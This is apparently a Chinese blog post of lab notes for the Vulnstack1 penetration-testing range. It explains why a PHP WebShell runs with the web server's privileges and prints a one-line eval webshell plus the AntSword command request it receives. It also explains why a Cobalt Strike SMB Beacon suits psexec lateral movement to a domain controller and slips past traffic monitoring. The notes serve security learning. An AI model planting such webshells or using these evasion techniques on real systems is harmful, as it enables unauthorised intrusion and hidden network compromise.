<p>简单来说，WebShell 并不是它“创造”了权限，而是它**“借用”<strong>并</strong>“导出”**了权限。</p>
<ol>
<li>权限的“寄生”关系</li>
</ol>
<p>Web 服务器为了处理动态请求（比如用户登录、提交表单），必须具备执行代码的能力（PHP, ASP.NET, Java 等）。</p>
<ul>
<li><strong>正常流程</strong>：用户访问 <code>index.php</code> -&gt; Web 服务启动 PHP 解释器 -&gt; 执行官方代码 -&gt; 返回网页。</li>
<li><strong>WebShell 流程</strong>：你上传了 <code>shell.php</code> -&gt; 用户访问 <code>shell.php</code> -&gt; Web 服务启动 PHP 解释器 -&gt; <strong>执行你的代码</strong>。</li>
</ul>
<p>此时，你的代码运行在 Web 服务的进程空间里。因此，<strong>Web 服务进程在操作系统里有什么权限，你的 WebShell 就有什么权限。</strong></p>
<ol start="2">
<li>为什么它能执行系统命令？</li>
</ol>
<p>绝大多数 Web 开发语言都提供了一些“后门”函数，用来让开发者调用系统底层的工具。WebShell 正是利用了这些函数：</p>
<ul>
<li><strong>PHP</strong>: <code>system()</code>, <code>exec()</code>, <code>shell_exec()</code>, <code>passthru()</code></li>
<li><strong>ASP.NET</strong>: <code>System.Diagnostics.Process.Start()</code></li>
<li><strong>Java</strong>: <code>Runtime.getRuntime().exec()</code></li>
</ul>
<h2 id="执行命令的过程"><a href="#执行命令的过程" class="headerlink" title="执行命令的过程"></a>执行命令的过程</h2><p>当你在蚁剑里输入 <code>whoami</code> 时，蚁剑实际上是发送了一个 HTTP 请求，告诉 <code>shell.php</code> 去调用 <code>system(&quot;whoami&quot;)</code>。Web 服务进程接收到指令，向操作系统申请开启一个 <code>cmd.exe</code> 或 <code>/bin/sh</code> 子进程，运行命令并将结果通过网页再传回给你。</p>
<p>这是一个非常经典的疑惑。表面上看，你只写了一行简单的 PHP 代码，但实际上这行代码起到了**“开门人”**的作用。</p>
<p>简单直接的回答是：<strong>有关系，但 WebShell 只是“载体”，真正的权限是由运行 PHP 的“Web 服务进程”赋予的。</strong></p>
<p>我们可以把这个过程拆解成三个层面来理解：</p>
<hr>
<ol>
<li>WebShell 的本质：动态指令接收器</li>
</ol>
<p>你写入的 <code>&lt;?php eval($_POST[&quot;cmd&quot;]);?&gt;</code> 实际上是一台**“远程指令翻译机”**：</p>
<ul>
<li><strong><code>eval()</code></strong>：这是 PHP 的一个极高权限函数，它的作用是“把字符串当作 PHP 代码来执行”。</li>
<li><strong><code>$_POST[&quot;cmd&quot;]</code></strong>：这是接收你（蚁剑）通过 HTTP 请求传过来的数据。</li>
</ul>
<p>当你用蚁剑连接时，蚁剑发出的数据其实是长这样的：</p>
<blockquote>
<figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">cmd</span> <span class="hljs-operator">=</span> system(<span class="hljs-string">&quot;whoami&quot;</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></blockquote>
<p>你的 WebShell 接收到这段字符串，通过 <code>eval()</code> 把它变成了真正的指令。所以，<strong>代码执行权限的“入口”确实是 WebShell 提供的。</strong></p>
<hr>
<ol start="2">
<li>权限的“天花板”：Web 服务器的身份</li>
</ol>
<p>虽然你的 WebShell 能执行任何指令，但它执行指令时，必须遵守操作系统的规则。</p>
<p><strong>关键点在这里：</strong> 当你通过 <code>eval</code> 调用系统命令（比如 <code>system()</code>）时，操作系统会查看**“是谁在申请运行这个命令？”**。</p>
<ul>
<li>因为你的 <code>shell.php</code> 是由 <strong>Apache &#x2F; Nginx &#x2F; IIS</strong> 调用的。</li>
<li>所以，操作系统认为申请者就是 <strong>Web 服务器进程</strong>。</li>
</ul>
<hr>
<h2 id="为什么需要配置单独的SMB监听器"><a href="#为什么需要配置单独的SMB监听器" class="headerlink" title="为什么需要配置单独的SMB监听器"></a>为什么需要配置单独的SMB监听器</h2><p>Listener：选择一个 SMB Beacon（内网横向的首选，通过 445 端口建立加密管道）。</p>
<p>选择 <strong>SMB Beacon</strong> 作为 <code>psexec</code> 攻击的监听器，主要是基于<strong>流量隐蔽性</strong>、<strong>网络拓扑限制</strong>以及<strong>权限维持</strong>这三个核心维度的考虑。</p>
<p>以下是详细的原因分析：</p>
<ol>
<li>突破内网隔离（无法直接连外网）</li>
</ol>
<p>在真实的内网环境中，域控（DC）通常被保护在最核心的区域，<strong>严禁直接访问互联网</strong>。</p>
<ul>
<li><strong>普通 Beacon (HTTP&#x2F;DNS)</strong>：如果给域控下发一个 HTTP 类型的 Payload，域控会尝试直接连接你的云服务器，但由于防火墙规则，连接会被直接丢弃。</li>
<li><strong>SMB Beacon</strong>：它是一种“被动”或“点对点”的通信方式。它不直接和外网联系，而是通过 <strong>命名管道 (Named Pipe)</strong> 依靠 <strong>445 端口</strong> 与已经上线的机器（如你的 STU1）通信。流量路径是：<code>域控 &lt;-&gt; STU1 &lt;-&gt; 你的 TeamServer</code>。</li>
</ul>
<ol start="2">
<li>利用合法端口和协议（隐蔽性）</li>
</ol>
<p>在内网中，445 端口（SMB 协议）是 Windows 机器之间共享文件、打印机和管理操作的“刚需”端口，流量极其频繁。</p>
<ul>
<li><strong>混淆视听</strong>：SMB Beacon 的所有指令和数据传输都封装在标准的 SMB 协议中。对于流量监控设备（如 IDS&#x2F;IPS）来说，这看起来就像是一次普通的管理员远程管理操作或文件传输，很难通过行为分析将其与恶意软件区分开。</li>
<li><strong>加密管道</strong>：CS 的 SMB Beacon 在命名管道中使用了额外的加密，即使流量被截获，也无法直接看到里面的指令内容。</li>
</ul>
<ol start="3">
<li>链式控制（多级跳板）</li>
</ol>
<p>SMB Beacon 允许你构建一个“链条”。</p>
<ul>
<li>当你通过 STU1 控制了域控 A，你还可以继续通过域控 A 使用 SMB Beacon 去控制域控 B。</li>
<li>这种架构就像串联的灯泡，你只需要维持好第一个“出口点”（STU1）的连接，整个内网的链条就都能保持在线。</li>
</ul>
<ol start="4">
<li>配合 PsExec 的天然优势</li>
</ol>
<p><code>psexec</code> 工具本身的运行原理就是建立在 SMB 协议（445 端口）之上的。</p>
<ul>
<li>既然 <code>psexec</code> 已经利用 445 端口在目标机器上成功创建了服务并运行了代码，此时直接在该端口内顺便建立一个通信管道（SMB Beacon），不需要额外开启新的端口，这在逻辑上是效率最高、改动最小的方案。</li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E5%86%85%E7%BD%91/" class="category-chain-item">内网</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%86%85%E7%BD%91/" class="print-no-link">#内网</a>
      
        <a href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/" class="print-no-link">#内网靶场</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>vulnstack1靶场笔记</div>
      <div>http://huang-d1.github.io/2026/03/31/vulnstack1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>huangdi</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年3月31日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/04/01/claude%E5%AE%89%E8%A3%85%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3/" title="claude安装问题解决">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">claude安装问题解决</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2026/03/27/Narak%E9%9D%B6%E5%9C%BA%E7%AC%94%E8%AE%B0/" title="Narak靶场笔记">
                        <span class="hidden-mobile">Narak靶场笔记</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://Hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://huang-d1.github.io" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
